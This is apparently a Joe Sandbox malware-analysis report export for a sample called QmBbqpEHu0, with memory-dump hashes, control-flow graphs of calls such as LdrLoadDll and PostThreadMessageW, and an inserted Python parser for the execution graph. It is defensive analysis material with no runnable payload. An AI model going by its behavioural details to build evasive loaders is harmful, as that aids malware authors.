                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fbf42003d8d4a271bc6c5eb6e38f52704f677d611c5057168301155b5fc03469
                                                                                                                                      • Instruction ID: 2eb4efd379d13f861387ecc9d8898067baaca153b0f8aa381b666f4535bea565
                                                                                                                                      • Opcode Fuzzy Hash: fbf42003d8d4a271bc6c5eb6e38f52704f677d611c5057168301155b5fc03469
                                                                                                                                      • Instruction Fuzzy Hash: 40B129B0D15609DFDB18CFA6D58169EFBB2FF89300F20D42AD416AB265DB349A06CF10
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f3b4d0ee9bdefc352993c1286155ac4af231dec812fe5dd697a664059ebd3e6d
                                                                                                                                      • Instruction ID: a6fddfa59408b4ce9ebdb948be3d7df74454315520cfaf94cf82d5bf07d08191
                                                                                                                                      • Opcode Fuzzy Hash: f3b4d0ee9bdefc352993c1286155ac4af231dec812fe5dd697a664059ebd3e6d
                                                                                                                                      • Instruction Fuzzy Hash: F6B106B1E15609DFDB18CFA6D58169EFBB2FF89300F20D42AD416AB254DB349A06DF10
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 98a455ded9ee026847e247385a9c8659098c48883a58f777610573c043c2a617
                                                                                                                                      • Instruction ID: 3f18005f5c5f0cb9097921457f19ed88649a5fcc2158d094b4b0bf5b656cdb4e
                                                                                                                                      • Opcode Fuzzy Hash: 98a455ded9ee026847e247385a9c8659098c48883a58f777610573c043c2a617
                                                                                                                                      • Instruction Fuzzy Hash: 3481C0B4A2525ACFCB44CFA9C9849DEBBF1FF89210F149566D415BB320D334AA42CF51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 96eda843f735cc535d6559cf1db732656c6c0b9cf6119f3b347acf91678014b0
                                                                                                                                      • Instruction ID: 9032ed3eb81a0a057e8c60807681be9f4bda8b66b01181be2e01a0c949dc50d9
                                                                                                                                      • Opcode Fuzzy Hash: 96eda843f735cc535d6559cf1db732656c6c0b9cf6119f3b347acf91678014b0
                                                                                                                                      • Instruction Fuzzy Hash: 7691B0B4A1525ACFCB44CF99C5849DEBBF1FF89210F24955AD415BB320D334AA42CF51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8b22d9700068af5b2621b47a2ea217a7c57cc1b9b86c3893e2ee9b8411199aa5
                                                                                                                                      • Instruction ID: 7b5e82de7ae16c5be27267e3e09481b304ade90b6f65f8abfef107c75250f134
                                                                                                                                      • Opcode Fuzzy Hash: 8b22d9700068af5b2621b47a2ea217a7c57cc1b9b86c3893e2ee9b8411199aa5
                                                                                                                                      • Instruction Fuzzy Hash: 0B812EB4D141298FCB14DFA9C6809EEFBB2FF89300F24C5AAD418A7255D7319941CF61
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 64a232fe569bd53012934779ecdf3d8df6c52200b3ac05eb569eb6fdbdab2cbd
                                                                                                                                      • Instruction ID: d3ac7c100a70068194dd35ea6e4091cbd2a9b41d453e889aa676eacb9e458297
                                                                                                                                      • Opcode Fuzzy Hash: 64a232fe569bd53012934779ecdf3d8df6c52200b3ac05eb569eb6fdbdab2cbd
                                                                                                                                      • Instruction Fuzzy Hash: 3A71F5B4E156098FCB04CFA9C5809DEFBF2FF99250F24982AD416B7264D3349A42CB64
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b535986c313783100c108aceb5560e78f7f9dd36778619fcf498f00dbdd92707
                                                                                                                                      • Instruction ID: 91f9163b69699c5d496fb6eda6c1bf8218e8aee32482bb67440a5bc059896ad3
                                                                                                                                      • Opcode Fuzzy Hash: b535986c313783100c108aceb5560e78f7f9dd36778619fcf498f00dbdd92707
                                                                                                                                      • Instruction Fuzzy Hash: 7271E5B4E15609CFCB14CFA9C5809DEFBF6FF99210F24942AD416BB264D3349A42CB64
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5df5c9edc2bad61d453f3097526125810726d22b48ef7d0b149cfd9d89920893
                                                                                                                                      • Instruction ID: f417506c612d682b278d22fe5af3e3096d5cb210def3909b1d88d7e88f8e7f85
                                                                                                                                      • Opcode Fuzzy Hash: 5df5c9edc2bad61d453f3097526125810726d22b48ef7d0b149cfd9d89920893
                                                                                                                                      • Instruction Fuzzy Hash: 7D510DB4E04219CBDB14CFA9C5805AEFBF2BF89304F24C169D819AB355D731A942CFA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 081dd2b418176068197bb4a5e04da8829e7f13b13e0453d547a8f61a5b75b980
                                                                                                                                      • Instruction ID: 3c6fe6e39aec7f607e8d5db109ebf85db38629f9d95dcc669dcaf09e1ca2895b
                                                                                                                                      • Opcode Fuzzy Hash: 081dd2b418176068197bb4a5e04da8829e7f13b13e0453d547a8f61a5b75b980
                                                                                                                                      • Instruction Fuzzy Hash: 974107B4D19209CBCF04CFAAD5405EEBBFAAF8A700F549026E81AB7211D7348941DF51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f5fdf311b2aa8049b5b3fe963bbea8aaa13e6017ef005baa216e55e1951526b4
                                                                                                                                      • Instruction ID: 93768b06e0a6f6f8435741dd376967d3e75085814eca54b7409f30c32bd4f01a
                                                                                                                                      • Opcode Fuzzy Hash: f5fdf311b2aa8049b5b3fe963bbea8aaa13e6017ef005baa216e55e1951526b4
                                                                                                                                      • Instruction Fuzzy Hash: 044118B1E0524ADFCB44CFAAC5815EEFBF2EF88300F24D46AC515A7254D7309A42CBA5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3ee3b4d38ad2a8f9238c960d76374a76fb0218935ec0b1bcd895d1a0d56bb1b5
                                                                                                                                      • Instruction ID: 0ecd3afb49774cc75617fd21961f537d80f3f39a30806fc3fd8bb9661610ceb5
                                                                                                                                      • Opcode Fuzzy Hash: 3ee3b4d38ad2a8f9238c960d76374a76fb0218935ec0b1bcd895d1a0d56bb1b5
                                                                                                                                      • Instruction Fuzzy Hash: B1414CB0E1561ADFCB04CFA6C5415EEFBF1EF89200F20D9AAD005A7264D7748A52CB91
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 237d53c6f1df7bb88c92392b0c2d5a1525671be9503672ebf71a16230a61fc28
                                                                                                                                      • Instruction ID: 3378f9557b9409adf3b6897ca2faacbd28da0faaa226ee6d5d4847b010314e2c
                                                                                                                                      • Opcode Fuzzy Hash: 237d53c6f1df7bb88c92392b0c2d5a1525671be9503672ebf71a16230a61fc28
                                                                                                                                      • Instruction Fuzzy Hash: 8041E6B0E0524ADFCB44CFAAC5815EEFBF2EF88200F24D96AC515B7214D7309A41CB94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d5f5b4efa2fe45f0067c670d7a6eecf95fbdfae06e0f01070f0a87d64b9f9919
                                                                                                                                      • Instruction ID: c4a4de67829c3fae5521da9a664a2c69acc1c3d29e6fc115a831bdccf8bcaf75
                                                                                                                                      • Opcode Fuzzy Hash: d5f5b4efa2fe45f0067c670d7a6eecf95fbdfae06e0f01070f0a87d64b9f9919
                                                                                                                                      • Instruction Fuzzy Hash: 65411AB0E1521ADFCB44CFA6D5416EEFBF1EB89200F10D9AAC005B7264D3749642CB94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8032a78ba2afd40d85fa08fec7f4d525a65a3cacd7dc32e3276acd785b8c9bf2
                                                                                                                                      • Instruction ID: 2ae185cd2b492e56b8728f5cb794da9aad485b2e0884a3d94b81fe88e74ec61b
                                                                                                                                      • Opcode Fuzzy Hash: 8032a78ba2afd40d85fa08fec7f4d525a65a3cacd7dc32e3276acd785b8c9bf2
                                                                                                                                      • Instruction Fuzzy Hash: 5F41E3B0E0520ADFCB08CFAAD5816EEFBF2AF89200F14C46AD415A7254D7349A42CF94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 314ebd7c6d678ea7c2ceaa1248dd3fa0f78ee37a290936b25d8886537e80e916
                                                                                                                                      • Instruction ID: b7ee99ec3952ecf8da4bc97e3f889c6ceef243295be29e7427df2f97a82044fc
                                                                                                                                      • Opcode Fuzzy Hash: 314ebd7c6d678ea7c2ceaa1248dd3fa0f78ee37a290936b25d8886537e80e916
                                                                                                                                      • Instruction Fuzzy Hash: 5241BEB0E0560ADFCB48CFAAC5815EEFBF2AF89200F24D46AD415B7254D7359A42CF94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2ee806a34df8d492e7c33de58c81022605fac6c4f1b5321a8a2a1dd7b3f1d091
                                                                                                                                      • Instruction ID: 4c9fe4dc80bc1e49775f24b610076318b56d00b642083b27485f364e9fd31181
                                                                                                                                      • Opcode Fuzzy Hash: 2ee806a34df8d492e7c33de58c81022605fac6c4f1b5321a8a2a1dd7b3f1d091
                                                                                                                                      • Instruction Fuzzy Hash: B421EFB1E046189BEB58CFABD8406DEFBF7AFC9200F05C076D518A6254EB3405568F55

Execution Graph

Execution Coverage: 1.3%
Dynamic/Decrypted Code Coverage: 4.8%
Signature Coverage: 7.5%
Total number of Nodes: 146
Total number of Limit Nodes: 13

The execution graph is rendered as an interactive node/edge graph in the original report; only its API-labelled nodes survive the text export. API-labelled nodes and the addresses they carry:
• LdrInitializeThunk: 1002b60, 1002c1f, 1002c70, 1002df0, 10035c0, 41b863, 42c3e3
• LdrLoadDll: 417e23
• NtClose: 42cd93, 42cdc1
• RtlAllocateHeap: 42d0ee, 42ef53, 42ef93
• RtlFreeHeap: 42d13e, 42ee73
• PostThreadMessageW: 414684
• ExitProcess: 42d163, 42d18e
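The execution graph above is exported by Joe Sandbox as a flat token stream (node id, hex address, optional API label, and `a->b` edges). The following parser is an added example, not code from the report or from Joe Sandbox, that rebuilds the graph from that stream and answers the two questions an analyst usually has about it: which APIs appear and at which addresses, and which functions can reach a given API such as LdrLoadDll. The token grammar is inferred from the export and is an assumption; the embedded sample is the 417dc3 / LdrLoadDll subgraph excerpted from this report's listing.

```python
"""Rebuild a Joe Sandbox execution_graph export and query it.

Assumed token grammar (inferred from the export, not documented by Joe Sandbox):
  <node_id> <hex_address> [<ApiName>]   node definition, API label optional
  <node_id>-><node_id>                  directed edge
"""
import re
from collections import defaultdict, deque

# Excerpt of this report's execution_graph listing: the subgraph around
# function 417dc3, whose block 417e23 calls LdrLoadDll (real report data).
SAMPLE_GRAPH = (
    "92026 414613 92032 4145e8 92026->92032 92027 4145f8 92028 41466d "
    "92029 414690 92028->92029 92031 414684 PostThreadMessageW 92028->92031 "
    "92031->92029 92032->92027 92032->92028 92033 417dc3 92032->92033 "
    "92034 417de7 92033->92034 92035 417e23 LdrLoadDll 92034->92035 "
    "92036 417dee 92034->92036 92035->92036 92036->92032"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]+$")
API_RE = re.compile(r"^[A-Z][A-Za-z0-9_]*$")  # Win32/Nt API names start uppercase


def parse_execution_graph(text):
    """Return ({node_id: (address, api_or_None)}, [(src_id, dst_id), ...])."""
    tokens = text.split()
    nodes, edges = {}, []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((edge.group(1), edge.group(2)))
            i += 1
            continue
        if NODE_ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            api = None
            # An API label, when present, directly follows the address.
            if i + 2 < len(tokens) and API_RE.match(tokens[i + 2]):
                api = tokens[i + 2]
                i += 1
            nodes[tok] = (tokens[i + 1] if api is None else tokens[i], api)
            i += 2
            continue
        raise ValueError(f"unexpected token {tok!r} at position {i}")
    return nodes, edges


def api_call_sites(nodes):
    """Map API name -> addresses of the nodes labelled with it, sorted numerically."""
    sites = defaultdict(set)
    for addr, api in nodes.values():
        if api:
            sites[api].add(addr)
    return {api: sorted(addrs, key=lambda a: int(a, 16)) for api, addrs in sites.items()}


def nodes_reaching(nodes, edges, api):
    """Addresses of every node from which a node labelled `api` is reachable.

    Breadth-first over the reversed edges, so loops (e.g. 417dee -> 4145e8
    back into the dispatcher) terminate. The labelled nodes themselves are excluded.
    """
    preds = defaultdict(list)
    for src, dst in edges:
        preds[dst].append(src)
    targets = {nid for nid, (_, label) in nodes.items() if label == api}
    seen, queue = set(targets), deque(targets)
    while queue:
        for pred in preds[queue.popleft()]:
            if pred not in seen:
                seen.add(pred)
                queue.append(pred)
    reach = {nodes[n][0] for n in seen - targets if n in nodes}
    return sorted(reach, key=lambda a: int(a, 16))


if __name__ == "__main__":
    g_nodes, g_edges = parse_execution_graph(SAMPLE_GRAPH)
    print(f"{len(g_nodes)} nodes, {len(g_edges)} edges")
    for name, addrs in sorted(api_call_sites(g_nodes).items()):
        print(f"{name:<20} {' '.join(addrs)}")
    print("functions reaching LdrLoadDll:", " ".join(nodes_reaching(g_nodes, g_edges, "LdrLoadDll")))
```

Pasting the full `execution_graph` token stream from a report into `parse_execution_graph` gives the complete graph; `nodes_reaching` then shows which code paths lead to the dynamic `LdrLoadDll` import, which is the path worth inspecting when a sample resolves its imports at run time instead of through the PE import table.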

Control-flow Graph

Control-flow graph of function 00417DC3 (the original report renders it as an interactive graph with executed blocks highlighted; that colouring is not recoverable from the text export). Basic blocks with their successors:
• 329: 417dc3-417dec, call 42fa53 → 332, 333
• 332: 417df2-417e00, call 430053 → 336, 337
• 333: 417dee-417df1
• 336: 417e10-417e21, call 42e4f3 → 342, 343
• 337: 417e02-417e0d, call 4302f3 → 336
• 342: 417e23-417e37, LdrLoadDll → 343
• 343: 417e3a-417e3d
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E35
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                      • Instruction ID: 2f2cbff0a24190b22dfd2152e99f66e997f339ee9ba054a098c76015c184d67c
                                                                                                                                      • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                      • Instruction Fuzzy Hash: D70175B1E0020DA7DF10DBE5DC42FDEB7B8AB54308F0081A6E90897240F634EB548B95

Control-flow Graph

Control-flow graph of function 0042CD93 (a single basic block; executed/not-executed colouring is not recoverable from the text export):
• 354: 42cd93-42cdcf, call 404943, call 42e003, NtClose
                                                                                                                                      APIs
                                                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CDCA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                      • Opcode ID: 1737473a9a3b8e2f9b3aa77562bc1deab7213942193e90c362335c3f221bbf7d
                                                                                                                                      • Instruction ID: b915159f885522db5443b9e3ff62b849829641cf8f4aa2f019e369742d55ea9e
                                                                                                                                      • Opcode Fuzzy Hash: 1737473a9a3b8e2f9b3aa77562bc1deab7213942193e90c362335c3f221bbf7d
                                                                                                                                      • Instruction Fuzzy Hash: 96E04F713002547BD220EA6ADC01FAB775CDBC5714F00445AFA18A7181D7B5B90186E4
APIs
Memory Dump Source
• Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 799d2144ba4fd47111ef188a0e4eb11960ceb2b5e9a37822072adbadaef7b09c
• Instruction ID: 0cc426c2d1e9fa6768d386fb94643cd85fe2e358ef3c29a4314e988b2cafd261
• Opcode Fuzzy Hash: 799d2144ba4fd47111ef188a0e4eb11960ceb2b5e9a37822072adbadaef7b09c
• Instruction Fuzzy Hash: 0A90026224240003510571588414616500A97E1201B95C022E1414590DC6298A916225
APIs
Memory Dump Source
• Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6c72ef69b68bebb47f41fedf33ba72c43464fa1ae8b2c22c7843afbc48aa8699
• Instruction ID: d2b7a1ee82d7afa17b8f0a1f38e232f0cf3ea1874ec52561f69316ecdcd1aaec
• Opcode Fuzzy Hash: 6c72ef69b68bebb47f41fedf33ba72c43464fa1ae8b2c22c7843afbc48aa8699
• Instruction Fuzzy Hash: 4D90023224140413E11171588504707100997D1241FD5C413A0824558DD75A8B52A221
APIs
Memory Dump Source
• Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 718871ee858764af645dc34be0ba9289d86e797a57e4ae3b31c2cbd21fe83659
• Instruction ID: 1f34e2f78afb672d425fec4e8975d048f3d879e3a34a2c95b40b0686c9cffc75
• Opcode Fuzzy Hash: 718871ee858764af645dc34be0ba9289d86e797a57e4ae3b31c2cbd21fe83659
• Instruction Fuzzy Hash: A690023224148803E1107158C40474A100597D1301F99C412A4824658DC7998A917221
APIs
Memory Dump Source
• Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4ba40549165ef3a676a1eada3ca5b40e96a494edfab552d7e206c7f3c0c1f4bb
• Instruction ID: 627a26d14b56bf02bd4a714ef9ab365f09276e7adeb7585be0e21c2d4f9b9b86
• Opcode Fuzzy Hash: 4ba40549165ef3a676a1eada3ca5b40e96a494edfab552d7e206c7f3c0c1f4bb
• Instruction Fuzzy Hash: 6790023264550403E10071588514706200597D1201FA5C412A0824568DC7998B5166A2

Control-flow Graph

• Entry block 4145c0-4145cb
• Block 414616-414628: call 42ef13
• Block 41462a-414633: call 42f923
• Block 414635-414666: call 417dc3, call 4048b3, call 425503
• Block 41467f-41468e: PostThreadMessageW
APIs
• PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 3G9s16YI$3G9s16YI
• API String ID: 1836367815-3632291559
• Opcode ID: 8db3aa977ed821cc02c9b9755325aba191a82c2463bed7ddff3301cc46a87eeb
• Instruction ID: a38a19859597c4e6e1d47c24a67c1ad7e9950002486cad7920d3763165c054a8
• Opcode Fuzzy Hash: 8db3aa977ed821cc02c9b9755325aba191a82c2463bed7ddff3301cc46a87eeb
• Instruction Fuzzy Hash: 62318E7290114C7FDB10DAA4AC81DEF7B6CAB9235CF04402FF904A7241E12D8E4687EA

Control-flow Graph

• Entry block 414595-4145a4
• Block 414616-414633: call 42ef13, call 42f923
• Block 414635-414666: call 417dc3, call 4048b3, call 425503
• Block 41467f-41468e: PostThreadMessageW
APIs
• PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 3G9s16YI$3G9s16YI
• API String ID: 1836367815-3632291559
• Opcode ID: 3381644c3cf99aabc76e807d659441e64835fb64e4ffc46ed3a73b671cb8bf04
• Instruction ID: 84db4ab4c16e3a995e9550d55e013f9a162ef2d0504a0c2f815f3073e6ddb3a0
• Opcode Fuzzy Hash: 3381644c3cf99aabc76e807d659441e64835fb64e4ffc46ed3a73b671cb8bf04
• Instruction Fuzzy Hash: DA112772D0115C7AEB10AAA19C82EEF7B7CDF82398F454069FA04B7242D63C4E0687B1

Control-flow Graph

• Entry block 41460a-41460e
• Block 414684-41468e: PostThreadMessageW
• Block 414614-414633: call 42ef13, call 42f923
• Block 414635-414666: call 417dc3, call 4048b3, call 425503
APIs
• PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 3G9s16YI$3G9s16YI
• API String ID: 1836367815-3632291559
• Opcode ID: 8e504f57ca564d4671762f9b9801edcb6fc5564ea8acf1417db21949e0a90039
• Instruction ID: 2f14aeb2a968f37d35cd1fc421451ae93ea76f2936ae965c16d40e7cd684983a
• Opcode Fuzzy Hash: 8e504f57ca564d4671762f9b9801edcb6fc5564ea8acf1417db21949e0a90039
• Instruction Fuzzy Hash: 37110672D0021C7AEB10AAE19C81DEF7B7CDF81358F41802AFA0467101D57C4E0687B5

Control-flow Graph

• Entry block 414613-414614
• Block 414616-414633: call 42ef13, call 42f923
• Block 414635-414646: call 417dc3
• Block 41464b-414666: call 4048b3, call 425503
• Block 41467f-41468e: PostThreadMessageW
APIs
• PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 3G9s16YI$3G9s16YI
• API String ID: 1836367815-3632291559
